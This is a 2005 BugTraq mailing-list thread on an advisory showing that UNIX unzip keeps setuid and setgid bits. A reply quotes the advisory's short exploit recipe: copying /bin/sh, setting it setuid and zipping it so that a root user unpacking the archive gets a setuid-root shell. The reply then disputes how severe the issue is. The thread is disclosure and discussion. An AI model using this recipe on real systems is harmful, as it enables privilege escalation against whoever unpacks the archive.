BugTraq
7a69Adv#22 - UNIX unzip keep setuid and setgid files Feb 28 2005 01:17PM
Albert Puigsech Galicia (ripe 7a69ezine org) (1 replies)
Re: 7a69Adv#22 - UNIX unzip keep setuid and setgid files Feb 28 2005 10:20PM
John Simpson (jms1 jms1 net) (1 replies)
On 28 Feb 2005, at 08:17, Albert Puigsech Galicia wrote:
>
> III. Exploit
>
> It's realy easy to test this vulnerability. You can create a malicious
> ZIP
> file following this example:
>
> $ cp /bin/sh .
> $ chmod 4777 sh
> $ zip malicious.zip sh
>
>
> When another user (including root) unpacks the file, a setuid shell
> file will
> be created without any warning, as you can see here:
>
> # id
> # unzip malicious.zip
> Archive: malicious.zip
> inflating: sh
> # ls -l sh
> -rwsrwxrwx 1 root root 705148 Jan 16 17:04 sh

this only works if the user un-zipping the file is already root.
otherwise it creates an "sh" binary which is setuid to the user who
unzipped the file. this kind of "exploit" is only useful if you can
somehow trick root into unzipping the file- it cannot be used to gain
root on a machine where you don't already have it.

although i will agree that having the unzip program warn the user when
creating a setuid or setgid file is a good idea in general.

--------------------------------------------------
| John M. Simpson - KG4ZOW - Programmer At Large |
| http://www.jms1.net/ <jms1 (at) jms1 (dot) net [email concealed]> |
--------------------------------------------------
| Mac OS X proves that it's easier to make UNIX |
| pretty than it is to make Windows secure. |
--------------------------------------------------

[ reply ]
Re: 7a69Adv#22 - UNIX unzip keep setuid and setgid files Mar 01 2005 04:04AM
Han Boetes (hanOUTOFOFFICETRAP mijncomputer nl) (2 replies)
Re: 7a69Adv#22 - UNIX unzip keep setuid and setgid files Mar 01 2005 07:44PM
exon (exon home se)
Re: 7a69Adv#22 - UNIX unzip keep setuid and setgid files Mar 01 2005 05:57PM
devnull Rodents Montreal QC CA


 

Privacy Statement
Copyright 2010, SecurityFocus